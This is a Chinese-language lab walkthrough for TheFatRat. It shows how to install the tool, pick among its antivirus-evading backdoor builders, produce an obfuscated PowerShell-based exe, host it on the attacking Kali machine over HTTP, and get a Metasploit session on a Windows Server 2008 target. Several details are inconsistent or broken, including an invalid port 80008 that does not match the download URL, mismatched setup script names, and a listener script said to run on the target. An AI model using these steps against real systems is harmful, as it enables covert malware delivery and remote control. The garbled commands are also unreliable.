kail攻击主机: Kali 192.168.11.106
靶机:windows server 2008 r2 192.168.11.134 x64 32位
一、TheFatRat介绍
TheFatRat创建的后门或者payload,可以在Linux,Windows,Mac和Android上等多种平台上执行,可生成exe、apk、sh、bat、py等多种格式。TheFatRat可以和msf无缝对接,并且集成内置了Fudwin、Avoid、backdoor-factory等多个免杀工具,对powershell的免杀姿势尤其多样。
特征:
- 全自动MSFvenom & Metasploit。
- 本地或远程侦听器生成。
- 按类别轻松制作后门操作系统。
- 生成各种格式的有效载荷。
- 绕过防病毒后门。
- 可以用于增加文件大小的文件泵。
- 能够检测外部IP和接口地址。
- 自动创建用于USB/CDROM利用的AutoRun文件。
二、kail机器安装TheFatRat
1、git clone https://github.com/Screetsec/TheFatRat.git
2、apt install mingw-w64 # 不可少
3、添加执行权限:chmod +x setup.sh powerfull.sh fatrat
4、./setup.py
正在自动完成一些相关的配置:
配置输出目录:
是否生成快捷方式:
在成功安装后,可以查看TheFatRat/logs目录下的setup.log文件,里面是TheFatRat需要的一些软件和环境:
作者提供了升级的命令,可直接升级软件:
./update && chmod + x setup.sh && ./setup.sh
三、使用TheFatRat
3.1、常用创建后门菜单
启动:./fatrat
启动过程比较慢,耐心等待,直至出现如下界面:
[01] Create Backdoor with msfvenom:直接利用msf生产后门,基本不能免杀;
[02] Create Fud 100% Backdoor with Fudwin 1.0:使用Fudwin 1.0创建powershell后门,ps1利用powerstager混淆,从结果来看效果不错;
[03] Create Fud Backdoor with Avoid v1.2:使用Avoid v1.2创建后门;
[04] Create Fud Backdoor with backdoor-factory:使用backdoor-factory创建后门;
[05] Backdooring Original apk [Instagram, Line,etc]:生成安卓使用的apk后门;
[06] Create Fud Backdoor 1000% with PwnWinds [Excelent]:综合了多种方式,可生成bat、exe、dll、ps1等,可利用c、C#多种语言编译,官方非常推荐,但经尝试免杀效果一般,肯定是被杀软列入特征库了;
[07] Create Backdoor For Office with Microsploit:生成office类后门;
[08] Trojan Debian Package For Remote Access [Trodebi]:生成linux后门;
3.2、生成后门或payload
在主菜单选择2,进入[02] Create Fud 100% Backdoor with Fudwin 1.0,选择1,利用powerstager混淆,并将powershell编译成exe。
若生成过程报错,去查看TheFatRat/logs目录下的fudwin.log文件,看看什么报错信息。
生成的rc脚本如下:用于后续msf攻击使用
生成的后门或者payload如下:
使用微步在线云沙箱 (threatbook.com) 在线检测样本,结果如下:
3.3、上传后门到靶机
用python打开一个http服务器:
cd /root/Desktop/Fatrat_Generated/
python -m http.server 80008
在靶机上访问http://192.168.11.106:14772可下载后门程序:
3.4、上传后门到靶机
1、靶机上执行3.2节生成的rc脚本:msf6 > resource /root/Desktop/TheFatRat/config/listeners/test1.rc
2、在靶机上执行后门程序test.exe.exe:
虽然报错,但可正常上线:
四、参考
6-2 自动化工具 FatRat介绍与安装_ev_哔哩哔哩_bilibili
6-3 Linux Payload安全测试_ev_哔哩哔哩_bilibili
远控免杀专题(10)-TheFatRat免杀(VT免杀率22/70) - SecPulse.COM | 安全脉搏
微步在线云沙箱 (threatbook.com) 在线检测样本
VirusTotal - Home 在线检测样本
